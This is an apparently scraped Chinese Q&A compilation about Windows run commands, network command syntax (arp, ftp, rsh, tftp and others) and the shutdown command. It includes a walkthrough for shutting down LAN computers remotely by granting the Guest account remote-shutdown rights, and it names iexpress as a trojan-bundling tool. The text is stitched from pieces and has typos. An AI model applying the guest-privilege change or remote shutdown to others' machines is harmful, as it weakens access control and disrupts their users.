-v与-b选项一起使用时将显示包含于为所有可执行组件创建连接或监听端口的组件。interval重新显示选定统计信息,每次显示之间请教:几个常用的DOS命令及注册表命令浏览次数:74741次悬赏分:15|解决时间:2007-1-1915:25|提问者:1860ask要求详细再详细。最佳答案开始-->运行regedit进入注册表补充些:1.gpedit.msc-----组策略2.sndrec32-------录音机3.Nslookup-------IP地址侦测器4.explorer-------打开资源管理器5.logoff---------注销命令6.tsshutdn-------60秒倒计时关机命令7.lusrmgr.msc----本机用户和组8.services.msc---本地服务设置9.oobe/msoobe/a----检查XP是否激活10.notepad--------打开记事本11.cleanmgr-------垃圾整理12.netstartmessenger----开始信使服务13.compmgmt.msc---计算机管理14.netstopmessenger-----停止信使服务15.conf-----------启动netmeeting16.dvdplay--------DVD播放器17.charmap--------启动字符映射表18.diskmgmt.msc---磁盘管理实用程序19.calc-----------启动计算器20.dfrg.msc-------磁盘碎片整理程序21.chkdsk.exe-----Chkdsk磁盘检查22.devmgmt.msc---设备管理器23.regsvr32/u*.dll----停止dll文件运行24.drwtsn32------系统医生25.rononce-p----15秒关机26.dxdiag---------检查DirectX信息27.regedt32-------注册表编辑器 28.Msconfig.exe---系统配置实用程序29.rsop.msc-------组策略结果集30.mem.exe--------显示内存使用情况31.regedit.exe----注册表32.winchat--------XP自带局域网聊天33.progman--------程序管理器34.winmsd---------系统信息35.perfmon.msc----计算机性能监测程序36.winver---------检查Windows版本37.sfc/scannow-----扫描错误并复原38.taskmgr-----任务管理器(2000/xp/200339.winver---------检查Windows版本40.wmimgmt.msc----打开windows管理体系结构(WMI)41.wupdmgr--------windows更新程序42.wscript--------windows脚本宿主设置43.write----------写字板44.winmsd---------系统信息45.wiaacmgr-------扫描仪和照相机向导46.winchat--------XP自带局域网聊天47.mem.exe--------显示内存使用情况48.Msconfig.exe---系统配置实用程序49.mplayer2-------简易widnowsmediaplayer50.mspaint--------画图板51.mstsc----------远程桌面连接52.mplayer2-------媒体播放机53.magnify--------放大镜实用程序54.mmc------------打开控制台55.mobsync--------同步命令56.dxdiag---------检查DirectX信息57.drwtsn32------系统医生58.devmgmt.msc---设备管理器59.dfrg.msc-------磁盘碎片整理程序60.diskmgmt.msc---磁盘管理实用程序61.dcomcnfg-------打开系统组件服务62.ddeshare-------打开DDE共享设置63.dvdplay--------DVD播放器64.netstopmessenger-----停止信使服务65.netstartmessenger----开始信使服务66.notepad--------打开记事本67.nslookup-------网络管理的工具向导68.ntbackup-------系统备份和还原69.narrator-------屏幕“讲述人” 70.ntmsmgr.msc----移动存储管理器71.ntmsoprq.msc---移动存储管理员操作请求72.netstat-an----(TC)命令检查接口73.syncapp--------创建一个公文包74.sysedit--------系统配置编辑器75.sigverif-------文件签名验证程序76.sndrec32-------录音机77.shrpubw--------创建共享文件夹78.secpol.msc-----本地安全策略79.syskey---------系统加密,一旦加密就不能解开,保护windowsxp系统的双重密码80.services.msc---本地服务设置81.Sndvol32-------音量控制程序82.sfc.exe--------系统文件检查器83.sfc/scannow---windows文件保护84.tsshutdn-------60秒倒计时关机命令85.tourstart------xp简介(安装完成后出现的漫游xp程序)86.taskmgr--------任务管理器87.eventvwr-------事件查看器88.eudcedit-------造字程序89.explorer-------打开资源管理器90.packager-------对象包装程序91.perfmon.msc----计算机性能监测程序92.progman--------程序管理器93.regedit.exe----注册表94.rsop.msc-------组策略结果集95.regedt32-------注册表编辑器96.rononce-p----15秒关机97.regsvr32/u*.dll----停止dll文件运行98.regsvr32/uzipfldr.dll------取消ZIP支持99.cmd.exe--------CMD命令提示符100.chkdsk.exe-----Chkdsk磁盘检查101.certmgr.msc----证书管理实用程序102.calc-----------启动计算器103.charmap--------启动字符映射表104.cliconfg-------SQLSERVER客户端网络实用程序105.Clipbrd--------剪贴板查看器106.conf-----------启动netmeeting107.compmgmt.msc---计算机管理108.cleanmgr-------垃圾整理109.ciadv.msc------索引服务程序110.osk------------打开屏幕键盘 111.odbcad32-------ODBC数据源管理器112.oobe/msoobe/a----检查XP是否激活113.lusrmgr.msc----本机用户和组114.logoff---------注销命令115.iexpress-------木马捆绑工具,系统自带116.Nslookup-------IP地址侦测器117.fsmgmt.msc-----共享文件夹管理器118.utilman--------辅助工具管理器119.gpedit.msc-----组策略暂停时间间隔(以秒计)。按CTRL+C停止重新显示统计信息。如果省略,netstat显示当前配置信息(只显示一次)网络DOS命令有那些呀?浏览次数:8032次悬赏分:10|提问时间:2005-11-1010:14|提问者:tianshi7898有那一位高人能否指点我一下好吗?推荐答案Arp显示和修改“地址解析协议”(ARP)所使用的到以太网的IP或令牌环物理地址翻译表。该命令只有在安装了TCP/IP协议之后才可用。arp-a[inet_addr][-N[if_addr]arp-dinet_addr[if_addr]arp-sinet_addrether_addr[if_addr]参数-a通过询问TCP/IP显示当前ARP项。如果指定了inet_addr,则只显示指定计算机的IP和物理地址。-g与-a相同。inet_addr以加点的十进制标记指定IP地址。-N显示由if_addr指定的网络界面ARP项。if_addr指定需要修改其地址转换表接口的IP地址(如果有的话)。如果不存在,将使用第一个可适用的接口。 -d删除由inet_addr指定的项。-s在ARP缓存中添加项,将IP地址inet_addr和物理地址ether_addr关联。物理地址由以连字符分隔的6个十六进制字节给定。使用带点的十进制标记指定IP地址。项是永久性的,即在超时到期后项自动从缓存删除。ether_addr指定物理地址。Finger在运行Finger服务的指定系统上显示有关用户的信息。根据远程系统输出不同的变量。该命令只有在安装了TCP/IP协议之后才可用。finger[-l][user]@computer[...]参数-l以长列表格式显示信息。user指定要获得相关信息的用户。省略用户参数以显示指定计算机上所有用户的信息:@computerFtp将文件传送到正在运行FTP服务的远程计算机或从正在运行FTP服务的远程计算机传送文件(有时称作daemon)。Ftp可以交互使用。单击“相关主题”列表中的“ftp命令”以获得可用的“ftp”子命令描述。该命令只有在安装了TCP/IP协议之后才可用。Ftp是一种服务,一旦启动,将创建在其中可以使用ftp命令的子环境,通过键入quit子命令可以从子环境返回到Windows2000命令提示符。当ftp子环境运行时,它由ftp命令提示符代表。ftp[-v][-n][-i][-d][-g][-s:filename][-a][-w:windowsize][computer]参数-v禁止显示远程服务器响应。-n禁止自动登录到初始连接。-i多个文件传送时关闭交互提示。 -d启用调试、显示在客户端和服务器之间传递的所有ftp命令。-g禁用文件名组,它允许在本地文件和路径名中使用通配符字符(*和?)。(请参阅联机“命令参考”中的glob命令。)-s:filename指定包含ftp命令的文本文件;当ftp启动后,这些命令将自动运行。该参数中不允许有空格。使用该开关而不是重定向(>)。-a在捆绑数据连接时使用任何本地接口。-w:windowsize替代默认大小为4096的传送缓冲区。computer指定要连接到远程计算机的计算机名或IP地址。如果指定,计算机必须是行的最后一个参数。Nbtstat该诊断命令使用NBT(TCP/IP上的NetBIOS)显示协议统计和当前TCP/IP连接。该命令只有在安装了TCP/IP协议之后才可用。nbtstat[-aremotename][-AIPaddress][-c][-n][-R][-r][-S][-s][interval]参数-aremotename使用远程计算机的名称列出其名称表。-AIPaddress使用远程计算机的IP地址并列出名称表。-c给定每个名称的IP地址并列出NetBIOS名称缓存的内容。-n列出本地NetBIOS名称。“已注册”表明该名称已被广播(Bnode)或者WINS(其他节点类型)注册。-R清除NetBIOS名称缓存中的所有名称后,重新装入Lmhosts文件。-r列出Windows网络名称解析的名称解析统计。在配置使用WINS的Windows2000计算机上,此选项返回要通过广播或WINS来解析和注册的名称数。-S显示客户端和服务器会话,只通过IP地址列出远程计算机。-s显示客户端和服务器会话。尝试将远程计算机IP地址转换成使用主机文件的名称。 interval重新显示选中的统计,在每个显示之间暂停interval秒。按CTRL+C停止重新显示统计信息。如果省略该参数,nbtstat打印一次当前的配置信息。Netstat显示协议统计和当前的TCP/IP网络连接。该命令只有在安装了TCP/IP协议后才可以使用。netstat[-a][-e][-n][-s][-pprotocol][-r][interval]参数-a显示所有连接和侦听端口。服务器连接通常不显示。-e显示以太网统计。该参数可以与-s选项结合使用。-n以数字格式显示地址和端口号(而不是尝试查找名称)。-s显示每个协议的统计。默认情况下,显示TCP、UDP、ICMP和IP的统计。-p选项可以用来指定默认的子集。-pprotocol显示由protocol指定的协议的连接;protocol可以是tcp或udp。如果与-s选项一同使用显示每个协议的统计,protocol可以是tcp、udp、icmp或ip。-r显示路由表的内容。interval重新显示所选的统计,在每次显示之间暂停interval秒。按CTRL+B停止重新显示统计。如果省略该参数,netstat将打印一次当前的配置信息。Ping验证与远程计算机的连接。该命令只有在安装了TCP/IP协议后才可以使用。ping[-t][-a][-ncount][-llength][-f][-ittl][-vtos][-rcount][-scount][-jcomputer-list]|[-kcomputer-list][-wtimeout]destination-list参数-tPing指定的计算机直到中断。-a将地址解析为计算机名。-ncount发送count指定的ECHO数据包数。默认值为4。 -llength发送包含由length指定的数据量的ECHO数据包。默认为32字节;最大值是65,527。-f在数据包中发送“不要分段”标志。数据包就不会被路由上的网关分段。-ittl将“生存时间”字段设置为ttl指定的值。-vtos将“服务类型”字段设置为tos指定的值。-rcount在“记录路由”字段中记录传出和返回数据包的路由。count可以指定最少1台,最多9台计算机。-scount指定count指定的跃点数的时间戳。-jcomputer-list利用computer-list指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP允许的最大数量为9。-kcomputer-list利用computer-list指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源)IP允许的最大数量为9。-wtimeout指定超时间隔,单位为毫秒。destination-list指定要ping的远程计算机。Rcp在Windows2000计算机和运行远程外壳端口监控程序rshd的系统之间复制文件。rcp命令是一个连接命令,从Windows2000计算机发出该命令时,也可以用于其他传输在两台运行rshd的计算机之间复制文件。rshd端口监控程序可以在UNIX计算机上使用,而在Windows2000上不能使用,所以Windows2000计算机仅可以作为发出命令的系统参与。远程计算机必须也通过运行rshd提供rcp实用程序。rcp[-a|-b][-h][-r]source1source2...sourceNdestination参数-a指定ASCII传输模式。此模式在传出文件上将回车/换行符转换为回车符,在传入文件中将换行符转换为回车/换行符。该模式为默认的传输模式。-b指定二进制图像传输模式。没有执行回车/换行符转换。 -h传输Windows2000计算机上标记为隐藏属性的源文件。如果没有该选项,在rcp命令行上指定隐藏文件的效果与文件不存在一样。-r将源的所有子目录内容递归复制到目标。source和destination都必须是目录,虽然即使源不是目录,使用-r也能够工作。但将没有递归。source和destination格式必须为[computer[.user]:]filename。如果忽略了[computer[.user]:]部分,计算机将假定为本地计算机。如果省略了[.user]部分,将使用当前登录的Windows2000用户名。如果使用了完全合格的计算机名,其中包含句点(.)分隔符,则必须包含[.user]。否则,计算机名的最后部分将解释为用户名。如果指定了多个源文件,则destination必须是目录。如果文件名不是以UNIX的正斜杠(/)或Windows2000系统的反斜杠()打头,则假定相对于当前的工作目录。在Windows2000中,这是发出命令的目录。在远程系统中,这是远程用户的登录目录。句点(.)表示当前的目录。在远程路径中使用转义字符(、"或'),以便在远程计算机中使用通配符。Rexec在运行REXEC服务的远程计算机上运行命令。rexec命令在执行指定命令前,验证远程计算机上的用户名,只有安装了TCP/IP协议后才可以使用该命令。rexeccomputer[-lusername][-n]command参数computer指定要运行command的远程计算机。-lusername指定远程计算机上的用户名。-n将rexec的输入重定向到NULL。command指定要运行的命令。Route控制网络路由表。该命令只有在安装了TCP/IP协议后才可以使用。route[-f][-p][command[destination][masksubnetmask][gateway][metriccostmetric]参数 -f清除所有网关入口的路由表。如果该参数与某个命令组合使用,路由表将在运行命令前清除。-p该参数与add命令一起使用时,将使路由在系统引导程序之间持久存在。默认情况下,系统重新启动时不保留路由。与print命令一起使用时,显示已注册的持久路由列表。忽略其他所有总是影响相应持久路由的命令。command指定下列的一个命令。命令目的print打印路由add添加路由delete删除路由change更改现存路由destination指定发送command的计算机。masksubnetmask指定与该路由条目关联的子网掩码。如果没有指定,将使用255.255.255.255。gateway指定网关。名为Networks的网络数据库文件和名为Hosts的计算机名数据库文件中均引用全部destination或gateway使用的符号名称。如果命令是print或delete,目标和网关还可以使用通配符,也可以省略网关参数。metriccostmetric指派整数跃点数(从1到9999)在计算最快速、最可靠和(或)最便宜的路由时使用。Rsh在运行RSH服务的远程计算机上运行命令。该命令只有在安装了TCP/IP协议后才可以使用。rshcomputer[-lusername][-n]command参数computer指定运行command的远程计算机。 -lusername指定远程计算机上使用的用户名。如果省略,则使用登录的用户名。-n将rsh的输入重定向到NULL。command指定要运行的命令。Tftp将文件传输到正在运行TFTP服务的远程计算机或从正在运行TFTP服务的远程计算机传输文件。该命令只有在安装了TCP/IP协议后才可以使用。tftp[-i]computer[get|put]source[destination]参数-i指定二进制图像传送模式(也称为“八位字节”)。在二进制图像模式中,文件一个字节接一个字节地逐字移动。在传送二进制文件时使用该模式。如果省略了-i,文件将以ASCII模式传送。这是默认的传送模式。此模式将EOL字符转换为UNIX的回车符和个人计算机的回车符/换行符。在传送文本文件时应使用此模式。如果文件传送成功,将显示数据传输率。computer指定本地或远程计算机。put将本地计算机上的文件destination传送到远程计算机上的文件source。get将远程计算机上的文件destination传送到本地计算机上的文件source。如果将本地计算机上的文件file-two传送到远程计算机上的文件file-one,请指定put。如果将远程计算机上的文件file-two传送到远程计算机上的文件file-one,请指定get。因为tftp协议不支持用户身份验证,所以用户必须登录,并且文件在远程计算机上必须可以写入。source指定要传送的文件。如果本地文件指定为-,则远程文件在stdout上打印出来(如果获取),或从stdin(如果放置)读取。destination指定将文件传送到的位置。如果省略了destination,将假定与source同名。Tracert 该诊断实用程序将包含不同生存时间(TTL)值的Internet控制消息协议(ICMP)回显数据包发送到目标,以决定到达目标采用的路由。要在转发数据包上的TTL之前至少递减1,必需路径上的每个路由器,所以TTL是有效的跃点计数。数据包上的TTL到达0时,路由器应该将“ICMP已超时”的消息发送回源系统。Tracert先发送TTL为1的回显数据包,并在随后的每次发送过程将TTL递增1,直到目标响应或TTL达到最大值,从而确定路由。路由通过检查中级路由器发送回的“ICMP已超时”的消息来确定路由。不过,有些路由器悄悄地下传包含过期TTL值的数据包,而tracert看不到。tracert[-d][-hmaximum_hops][-jcomputer-list][-wtimeout]target_name参数/d指定不将地址解析为计算机名。-hmaximum_hops指定搜索目标的最大跃点数。-jcomputer-list指定沿computer-list的稀疏源路由。-wtimeout每次应答等待timeout指定的微秒数。target_name目标计算机的名称参考资料:http://www.emroom.com/News/2005/6-20/2005620111048.htmlDOS关机命令浏览次数:1486次悬赏分:5|解决时间:2010-12-1212:47|提问者:哈姆雷啦最佳答案shutdown[-i|-l|-s|-r|-a][-f][-m\computername][-txx][-c"comment"][-dup:xx:yy]没有参数显示此消息(与?相同)-i显示GUI界面,必须是第一个选项-l注销(不能与选项-m一起使用)-s关闭此计算机-r关闭并重启动此计算机-a放弃系统关机-m\computername远程计算机关机/重启动/放弃-txx设置关闭的超时为xx秒-c"comment"关闭注释(最大127个字符)-f强制运行的应用程序关闭而没有警告-d[p]:xx:yy关闭原因代码u是用户代码 p是一个计划的关闭代码xx是一个主要原因代码(小于256的正整数)yy是一个次要原因代码(小于65536的正整数)-f:强行关闭应用程序-m\\计算机名:控制远程计算机-i:显示图形用户界面,但必须是Shutdown的第一个选项-l:注销当前用户-r:关机并重启-t时间:设置关机倒计时-c"消息内容":输入关机对话框中的消息内容(不能超127个字符)用dos命令shut怎么远程关机啊?详细点!浏览次数:8284次悬赏分:50|解决时间:2007-10-1018:10|提问者:icoming最佳答案在WindowsXP中,新增了一条命令行工具“shutdown”,其作用是“关闭或重新启动本地或远程计算机”。利用它,我们不但可以注销用户,关闭或重新启动计算机,还可以实现定时关机、远程关机。该命令的语法格式如下:shutdown[-i-l-s-r-a][-f][-m[\ComputerName]][-txx][-c"message"][-d[u][p]:xx:yy]其中,各参数的含义为:-i显示图形界面的对话框。-l注销当前用户,这是默认设置。-mComputerName优先。-s关闭计算机。-r关闭之后重新启动。-a中止关闭。除了-l和ComputerName外,系统将忽略其它参数。在超时期间,您只可以使用-a。-f强制运行要关闭的应用程序。-m[\ComputerName]指定要关闭的计算机。-txx将用于系统关闭的定时器设置为xx秒。默认值是20秒。 -c"message"指定将在“系统关闭”窗口中的“消息”区域显示的消息。最多可以使用127个字符。引号中必须包含消息。-d[u][p]:xx:yy列出系统关闭的原因代码。首先,我们来看一下该命令的一些基本用法:1、注销当前用户shutdown-l该命令只能注销本机用户,对远程计算机不适用。2、关闭本地计算机shutdown-s3、重启本地计算机shutdown-r4、定时关机shutdown-s-t30指定在30秒之后自动关闭计算机。5、中止计算机的关闭有时我们设定了计算机定时关机后,如果出于某种原因又想取消这次关机操作,就可以用shutdown-a来中止。如:shutdown-s–t300设定计算机在5分钟后关闭。Shutdown–a取消上述关机操作。以上是shutdown命令在本机中的一些基本应用。前面我们已经介绍过,该命令除了关闭、重启本地计算机外,更重要的是它还能对远程计算机进行操作,但是如何才能实现呢?在该命令的格式中,有一个参数[-m[\ComputerName],用它可以指定将要关闭或重启的计算机名称,省略的话则默认为对本机操作。于是,我用以下命令试了一下:shutdown–s–m etproxy-t30 (在30秒内关闭计算机名为netproxy的机器;注:netproxy为局域网内一台同样装有WindowsXP的电脑)但该命令执行后,计算机netproxy一点反应都没有,我的屏幕上却返回这样一句话:Accessisdenied(拒绝访问)。为什么会出现这种情况呢?我想了半天,四处查找有关的资料,终于发现,在WindowsXP默认的安全策略中,只有管理员组的用户才有权从远端关闭计算机,而一般情况下我们从局域网内的其他电脑来访问该计算机时,则只有guest用户权限,所以当我们执行上述命令时,便会出现“拒绝访问”的情况。找到问题的根源之后,解决的办法也很简单,只要在客户计算机(能够被远程关闭的计算机,如上述的netproxy)中赋予guest用户远程关机的权限即可。这可利用WindowsXP的“组策略”或“管理工具”中的“本地安全策略”来实现。下面以“组策略”为例进行介绍:1、单击“开始”按钮,选择“运行”,在对话框中输入“gpedit.msc”,然后单击“确定”,打开“组策略编辑器”。2、在“组策略”窗口的左窗格中打开“计算机配置”—“Windows设置”—“安全设置”—“本地策略”—“用户权利指派”。(如图)3、在“组策略”窗口的右窗格中选择“Forceshutdownfromaremotesystem(从远端系统强制关机)”,双击。4、在弹出的对话框中显示目前只有“Administrators”组的成员才有权从远程关机;单击对话框下方的“添加用户或组”按钮,然后在新弹出的对话框中输入“guest”,再单击“确定”。5、这时在“从远端系统强制关机”的属性中便添加了一个“guest”用户,单击“确定”即可。6、关闭“组策略”窗中。通过上述操作后,我们便给计算机netproxy的guest用户授予了远程关机的权限。以后,我们要远程关闭计算机netproxy,只要在网络中其他装有WindowsXP的电脑中输入以下命令即可:shutdown-s–m etproxy-t30(其他参数用法同上) 这时,在netproxy计算机的屏幕上将显示一个“系统关机”的对话框,提示“系统即将关机。请保存所有正在运行的工作,然后注销。未保存的改动将会丢失。关机是由netproxyguest初始的。”在对话框下方还有一个计时器,显示离关机还有多少时间。在等待关机的时间里,用户还可以执行其他的任务,如关闭程序、打开文件等,但无法关闭该对话框,除非你用shutdown–a命令来中止关机任务。最后,有一点要说明的是,shutdown命令不但可以远程关闭装有WindowsXP系统的计算机,它还可以远程关闭装有Windows2000系统的计算机(对于Win9X嘛,好像不适用)。有关Windows2000客户计算机上的一些设置,操作方法同上,这里就不再多说了。另外shutdown作为一个外部命令(其对应文件为Windowssystem32文件夹下的shutdown.exe),我们还可将它复制到Windows2000的机器上,这样,在装有Windows2000系统的机器之间便也能相互实现远程关机。

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。
大家都在看
近期热门
关闭